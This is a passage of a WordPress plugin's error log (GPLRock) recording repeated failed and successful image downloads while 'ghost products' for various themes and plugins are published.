meatlers-butcher-meat-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:33:33 UTC] GPLRock: Image download failed for product meatlers-butcher-meat-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:35 UTC] GPLRock: Image download failed for product meatlers-butcher-meat-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/meatlers---butcher-meat-shop-wordpress-theme-13019.webp for product meatlers-butcher-meat-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:33:37 UTC] GPLRock WARNING: Image download failed for product meatlers-butcher-meat-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/meatlers---butcher-meat-shop-wordpress-theme-13019.webp [09-Mar-2026 23:33:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: meatlers-butcher-meat-shop-wordpress-theme [09-Mar-2026 23:33:37 UTC] GPLRock: Image download failed for product milan-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:39 UTC] GPLRock: Image download failed for product milan-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/milan--restaurant-wordpress-theme-8480.webp for product milan-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:33:41 UTC] GPLRock: Image download failed for product milan-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:44 UTC] GPLRock: Image download failed for product milan-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 23:33:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/milan--restaurant-wordpress-theme-8480.webp for product milan-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 23:33:46 UTC] GPLRock WARNING: Image download failed for product milan-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/milan--restaurant-wordpress-theme-8480.webp [09-Mar-2026 23:33:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: milan-restaurant-wordpress-theme [10-Mar-2026 01:35:37 UTC] GPLRock: Image download failed for product icalendars-add-on-chauffeur-taxi-booking-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:35:39 UTC] GPLRock: Image download failed for product icalendars-add-on-chauffeur-taxi-booking-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:35:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/icalendars-add-on-chauffeur-taxi-booking-system-27196.webp for product icalendars-add-on-chauffeur-taxi-booking-system after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:35:41 UTC] GPLRock: Image download failed for product icalendars-add-on-chauffeur-taxi-booking-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:35:43 UTC] GPLRock: Image download failed for product icalendars-add-on-chauffeur-taxi-booking-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:35:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/icalendars-add-on-chauffeur-taxi-booking-system-27196.webp for product icalendars-add-on-chauffeur-taxi-booking-system after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:35:45 UTC] GPLRock WARNING: Image download failed for product icalendars-add-on-chauffeur-taxi-booking-system. URL: https://meldwp.com/wp-content/uploads/icalendars-add-on-chauffeur-taxi-booking-system-27196.webp [10-Mar-2026 01:35:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: icalendars-add-on-chauffeur-taxi-booking-system [10-Mar-2026 01:35:46 UTC] GPLRock: Image download failed for product ht-qr-code-generator-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:35:48 UTC] GPLRock: Image download failed for product ht-qr-code-generator-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:35:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ht-qr-code-generator-for-wordpress-9591.webp for product ht-qr-code-generator-for-wordpress after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:35:50 UTC] GPLRock: Image download failed for product ht-qr-code-generator-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:35:52 UTC] GPLRock: Image download failed for product ht-qr-code-generator-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:35:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ht-qr-code-generator-for-wordpress-9591.webp for product ht-qr-code-generator-for-wordpress after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:35:54 UTC] GPLRock WARNING: Image download failed for product ht-qr-code-generator-for-wordpress. URL: https://meldwp.com/wp-content/uploads/ht-qr-code-generator-for-wordpress-9591.webp [10-Mar-2026 01:35:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ht-qr-code-generator-for-wordpress [10-Mar-2026 01:35:55 UTC] GPLRock: Image download failed for product videor-video-clipping-mask-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:35:57 UTC] GPLRock: Image download failed for product videor-video-clipping-mask-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:35:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/videor--video-clipping-mask-for-elementor-13209.webp for product videor-video-clipping-mask-for-elementor after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:35:59 UTC] GPLRock: Image download failed for product videor-video-clipping-mask-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:01 UTC] GPLRock: Image download failed for product videor-video-clipping-mask-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/videor--video-clipping-mask-for-elementor-13209.webp for product videor-video-clipping-mask-for-elementor after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:36:03 UTC] GPLRock WARNING: Image download failed for product videor-video-clipping-mask-for-elementor. URL: https://meldwp.com/wp-content/uploads/videor--video-clipping-mask-for-elementor-13209.webp [10-Mar-2026 01:36:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: videor-video-clipping-mask-for-elementor [10-Mar-2026 01:36:04 UTC] GPLRock: Image download failed for product circle-progress-bar-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:06 UTC] GPLRock: Image download failed for product circle-progress-bar-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/circle-progress-bar-elementor-17302.webp for product circle-progress-bar-elementor after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:36:08 UTC] GPLRock: Image download failed for product circle-progress-bar-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:10 UTC] GPLRock: Image download failed for product circle-progress-bar-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/circle-progress-bar-elementor-17302.webp for product circle-progress-bar-elementor after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:36:12 UTC] GPLRock WARNING: Image download failed for product circle-progress-bar-elementor. URL: https://meldwp.com/wp-content/uploads/circle-progress-bar-elementor-17302.webp [10-Mar-2026 01:36:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: circle-progress-bar-elementor [10-Mar-2026 01:36:12 UTC] GPLRock: Image download failed for product woocommerce-custom-text-and-elements (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:14 UTC] GPLRock: Image download failed for product woocommerce-custom-text-and-elements (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-custom-text-and-elements-22893.webp for product woocommerce-custom-text-and-elements after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:36:17 UTC] GPLRock: Image download failed for product woocommerce-custom-text-and-elements (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:19 UTC] GPLRock: Image download failed for product woocommerce-custom-text-and-elements (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-custom-text-and-elements-22893.webp for product woocommerce-custom-text-and-elements after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:36:21 UTC] GPLRock WARNING: Image download failed for product woocommerce-custom-text-and-elements. URL: https://meldwp.com/wp-content/uploads/woocommerce-custom-text-and-elements-22893.webp [10-Mar-2026 01:36:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-custom-text-and-elements [10-Mar-2026 01:36:21 UTC] GPLRock: Image downloaded successfully for product vimuse-media-player-layers-extension (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fcfb7cef.webp [10-Mar-2026 01:36:21 UTC] GPLRock: Using pre-downloaded image for product vimuse-media-player-layers-extension: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fcfb7cef.webp [10-Mar-2026 01:36:21 UTC] GPLRock: Ghost product published with image - Product ID: vimuse-media-player-layers-extension [10-Mar-2026 01:36:21 UTC] GPLRock: Image download failed for product membership-manager-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:23 UTC] GPLRock: Image download failed for product membership-manager-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/membership-manager-pro-25500.webp for product membership-manager-pro after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:36:25 UTC] GPLRock: Image download failed for product membership-manager-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:27 UTC] GPLRock: Image download failed for product membership-manager-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/membership-manager-pro-25500.webp for product membership-manager-pro after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:36:29 UTC] GPLRock WARNING: Image download failed for product membership-manager-pro. URL: https://meldwp.com/wp-content/uploads/membership-manager-pro-25500.webp [10-Mar-2026 01:36:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: membership-manager-pro [10-Mar-2026 01:36:30 UTC] GPLRock: Image download failed for product woocommerce-manual-pricing-name-your-price-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:32 UTC] GPLRock: Image download failed for product woocommerce-manual-pricing-name-your-price-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 01:36:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-manual-pricing---name-your-price-plugin-24171.webp for product woocommerce-manual-pricing-name-your-price-plugin after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 01:36:34 UTC] GPLRock: Image download failed for product woocommerce-manual-pricing-name-your-price-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:00 UTC] GPLRock: Image downloaded successfully for product image-accordion-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7c53f125.webp [10-Mar-2026 03:44:00 UTC] GPLRock: Using pre-downloaded image for product image-accordion-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7c53f125.webp [10-Mar-2026 03:44:00 UTC] GPLRock: Ghost product published with image - Product ID: image-accordion-for-elementor [10-Mar-2026 03:44:01 UTC] GPLRock: Image download failed for product social-stream-for-wordpress-add-facebook-youtube-instagram-feed-to-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:03 UTC] GPLRock: Image download failed for product social-stream-for-wordpress-add-facebook-youtube-instagram-feed-to-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-stream-for-wordpress--add-facebook-youtube-instagram-feed-to-wordpress-23849.webp for product social-stream-for-wordpress-add-facebook-youtube-instagram-feed-to-wordpress after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:05 UTC] GPLRock: Image download failed for product social-stream-for-wordpress-add-facebook-youtube-instagram-feed-to-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:07 UTC] GPLRock: Image download failed for product social-stream-for-wordpress-add-facebook-youtube-instagram-feed-to-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-stream-for-wordpress--add-facebook-youtube-instagram-feed-to-wordpress-23849.webp for product social-stream-for-wordpress-add-facebook-youtube-instagram-feed-to-wordpress after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:09 UTC] GPLRock WARNING: Image download failed for product social-stream-for-wordpress-add-facebook-youtube-instagram-feed-to-wordpress. URL: https://meldwp.com/wp-content/uploads/social-stream-for-wordpress--add-facebook-youtube-instagram-feed-to-wordpress-23849.webp [10-Mar-2026 03:44:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-stream-for-wordpress-add-facebook-youtube-instagram-feed-to-wordpress [10-Mar-2026 03:44:09 UTC] GPLRock: Image download failed for product bundle-flipbook-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:11 UTC] GPLRock: Image download failed for product bundle-flipbook-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bundle-flipbook-wordpress-plugin-22471.webp for product bundle-flipbook-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:14 UTC] GPLRock: Image download failed for product bundle-flipbook-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:16 UTC] GPLRock: Image download failed for product bundle-flipbook-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bundle-flipbook-wordpress-plugin-22471.webp for product bundle-flipbook-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:18 UTC] GPLRock WARNING: Image download failed for product bundle-flipbook-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/bundle-flipbook-wordpress-plugin-22471.webp [10-Mar-2026 03:44:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bundle-flipbook-wordpress-plugin [10-Mar-2026 03:44:18 UTC] GPLRock: Image download failed for product voip-pricing-calculator-voip-calling-rates-sms-rates-mobile-top-up-rates-tablecalculator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:20 UTC] GPLRock: Image download failed for product voip-pricing-calculator-voip-calling-rates-sms-rates-mobile-top-up-rates-tablecalculator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voip-pricing-calculator--voip-calling-rates-sms-rates-mobile-top-up-rates-tablec-21971.webp for product voip-pricing-calculator-voip-calling-rates-sms-rates-mobile-top-up-rates-tablecalculator after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:22 UTC] GPLRock: Image download failed for product voip-pricing-calculator-voip-calling-rates-sms-rates-mobile-top-up-rates-tablecalculator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:24 UTC] GPLRock: Image download failed for product voip-pricing-calculator-voip-calling-rates-sms-rates-mobile-top-up-rates-tablecalculator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voip-pricing-calculator--voip-calling-rates-sms-rates-mobile-top-up-rates-tablec-21971.webp for product voip-pricing-calculator-voip-calling-rates-sms-rates-mobile-top-up-rates-tablecalculator after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:26 UTC] GPLRock WARNING: Image download failed for product voip-pricing-calculator-voip-calling-rates-sms-rates-mobile-top-up-rates-tablecalculator. URL: https://meldwp.com/wp-content/uploads/voip-pricing-calculator--voip-calling-rates-sms-rates-mobile-top-up-rates-tablec-21971.webp [10-Mar-2026 03:44:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: voip-pricing-calculator-voip-calling-rates-sms-rates-mobile-top-up-rates-tablecalculator [10-Mar-2026 03:44:26 UTC] GPLRock: Image download failed for product on-scroll-layout-galleries-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:29 UTC] GPLRock: Image download failed for product on-scroll-layout-galleries-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/on-scroll-layout-galleries-for-elementor-15810.webp for product on-scroll-layout-galleries-for-elementor after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:31 UTC] GPLRock: Image download failed for product on-scroll-layout-galleries-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:33 UTC] GPLRock: Image download failed for product on-scroll-layout-galleries-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/on-scroll-layout-galleries-for-elementor-15810.webp for product on-scroll-layout-galleries-for-elementor after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:35 UTC] GPLRock WARNING: Image download failed for product on-scroll-layout-galleries-for-elementor. URL: https://meldwp.com/wp-content/uploads/on-scroll-layout-galleries-for-elementor-15810.webp [10-Mar-2026 03:44:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: on-scroll-layout-galleries-for-elementor [10-Mar-2026 03:44:35 UTC] GPLRock: Image download failed for product social-share-top-bar-addon-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:37 UTC] GPLRock: Image download failed for product social-share-top-bar-addon-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-share-top-bar-addon---wordpress-4782.webp for product social-share-top-bar-addon-wordpress after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:40 UTC] GPLRock: Image download failed for product social-share-top-bar-addon-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:42 UTC] GPLRock: Image download failed for product social-share-top-bar-addon-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-share-top-bar-addon---wordpress-4782.webp for product social-share-top-bar-addon-wordpress after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:44 UTC] GPLRock WARNING: Image download failed for product social-share-top-bar-addon-wordpress. URL: https://meldwp.com/wp-content/uploads/social-share-top-bar-addon---wordpress-4782.webp [10-Mar-2026 03:44:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-share-top-bar-addon-wordpress [10-Mar-2026 03:44:44 UTC] GPLRock: Image download failed for product bwd-pricing-table-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:46 UTC] GPLRock: Image download failed for product bwd-pricing-table-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwd-pricing-table-addon-for-elementor-26370.webp for product bwd-pricing-table-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:48 UTC] GPLRock: Image download failed for product bwd-pricing-table-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:50 UTC] GPLRock: Image download failed for product bwd-pricing-table-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwd-pricing-table-addon-for-elementor-26370.webp for product bwd-pricing-table-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:52 UTC] GPLRock WARNING: Image download failed for product bwd-pricing-table-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/bwd-pricing-table-addon-for-elementor-26370.webp [10-Mar-2026 03:44:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bwd-pricing-table-addon-for-elementor [10-Mar-2026 03:44:52 UTC] GPLRock: Image downloaded successfully for product skype-button-add-a-multi-function-skype-button (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdd1c325.webp [10-Mar-2026 03:44:53 UTC] GPLRock: Using pre-downloaded image for product skype-button-add-a-multi-function-skype-button: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdd1c325.webp [10-Mar-2026 03:44:53 UTC] GPLRock: Ghost product published with image - Product ID: skype-button-add-a-multi-function-skype-button [10-Mar-2026 03:44:53 UTC] GPLRock: Image download failed for product woocommerce-photography-plugin-sell-photos-online (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:55 UTC] GPLRock: Image download failed for product woocommerce-photography-plugin-sell-photos-online (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-photography-plugin---sell-photos-online-20981.webp for product woocommerce-photography-plugin-sell-photos-online after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:44:57 UTC] GPLRock: Image download failed for product woocommerce-photography-plugin-sell-photos-online (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:44:59 UTC] GPLRock: Image download failed for product woocommerce-photography-plugin-sell-photos-online (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:45:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-photography-plugin---sell-photos-online-20981.webp for product woocommerce-photography-plugin-sell-photos-online after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:45:01 UTC] GPLRock WARNING: Image download failed for product woocommerce-photography-plugin-sell-photos-online. URL: https://meldwp.com/wp-content/uploads/woocommerce-photography-plugin---sell-photos-online-20981.webp [10-Mar-2026 03:45:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-photography-plugin-sell-photos-online [10-Mar-2026 03:45:01 UTC] GPLRock: Image download failed for product news-addons-for-elementor-ultimate-news-blog-and-magazine-widgets (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:45:04 UTC] GPLRock: Image download failed for product news-addons-for-elementor-ultimate-news-blog-and-magazine-widgets (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:45:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/news-addons-for-elementor---ultimate-news-blog-and-magazine-widgets-2842.webp for product news-addons-for-elementor-ultimate-news-blog-and-magazine-widgets after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:45:06 UTC] GPLRock: Image download failed for product news-addons-for-elementor-ultimate-news-blog-and-magazine-widgets (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:45:08 UTC] GPLRock: Image download failed for product news-addons-for-elementor-ultimate-news-blog-and-magazine-widgets (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 03:45:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/news-addons-for-elementor---ultimate-news-blog-and-magazine-widgets-2842.webp for product news-addons-for-elementor-ultimate-news-blog-and-magazine-widgets after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 03:45:10 UTC] GPLRock WARNING: Image download failed for product news-addons-for-elementor-ultimate-news-blog-and-magazine-widgets. URL: https://meldwp.com/wp-content/uploads/news-addons-for-elementor---ultimate-news-blog-and-magazine-widgets-2842.webp [10-Mar-2026 03:45:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: news-addons-for-elementor-ultimate-news-blog-and-magazine-widgets [10-Mar-2026 08:38:21 UTC] GPLRock: Image downloaded successfully for product edumall-professional-lms-education-center-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8cef1f6d.avif [10-Mar-2026 08:38:21 UTC] GPLRock: Using pre-downloaded image for product edumall-professional-lms-education-center-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8cef1f6d.avif [10-Mar-2026 08:38:21 UTC] GPLRock: Ghost product published with image - Product ID: edumall-professional-lms-education-center-wordpress-theme [10-Mar-2026 08:38:22 UTC] GPLRock: Image downloaded successfully for product cartflows-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-71f58441.jpg [10-Mar-2026 08:38:22 UTC] GPLRock: Using pre-downloaded image for product cartflows-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-71f58441.jpg [10-Mar-2026 08:38:22 UTC] GPLRock: Ghost product published with image - Product ID: cartflows-pro [10-Mar-2026 08:38:24 UTC] GPLRock: Image download failed for product edubin-education-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [10-Mar-2026 08:38:28 UTC] GPLRock: Image download failed for product edubin-education-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [10-Mar-2026 08:38:31 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/06/Edubin-Theme.png for product edubin-education-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [10-Mar-2026 08:38:33 UTC] GPLRock: Image download failed for product edubin-education-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [10-Mar-2026 08:38:37 UTC] GPLRock: Image download failed for product edubin-education-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [10-Mar-2026 08:38:40 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/06/Edubin-Theme.png for product edubin-education-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [10-Mar-2026 08:38:40 UTC] GPLRock WARNING: Image download failed for product edubin-education-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/06/Edubin-Theme.png [10-Mar-2026 08:38:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: edubin-education-wordpress-theme [10-Mar-2026 08:38:41 UTC] GPLRock: Image downloaded successfully for product phox-hosting-wordpress-whmcs-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e195a4cc.jpg [10-Mar-2026 08:38:42 UTC] GPLRock: Using pre-downloaded image for product phox-hosting-wordpress-whmcs-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e195a4cc.jpg [10-Mar-2026 08:38:42 UTC] GPLRock: Ghost product published with image - Product ID: phox-hosting-wordpress-whmcs-theme [10-Mar-2026 08:38:43 UTC] GPLRock: Image downloaded successfully for product mirasat-internet-provider-and-satellite-tv-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de6792a5.jpg [10-Mar-2026 08:38:43 UTC] GPLRock: Using pre-downloaded image for product mirasat-internet-provider-and-satellite-tv-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de6792a5.jpg [10-Mar-2026 08:38:43 UTC] GPLRock: Ghost product published with image - Product ID: mirasat-internet-provider-and-satellite-tv-wordpress-theme [10-Mar-2026 08:38:44 UTC] GPLRock: Image downloaded successfully for product give-razorpay-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a6573038.jpg [10-Mar-2026 08:38:44 UTC] GPLRock: Using pre-downloaded image for product give-razorpay-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a6573038.jpg [10-Mar-2026 08:38:44 UTC] GPLRock: Ghost product published with image - Product ID: give-razorpay-gateway [10-Mar-2026 08:38:46 UTC] GPLRock: Image downloaded successfully for product 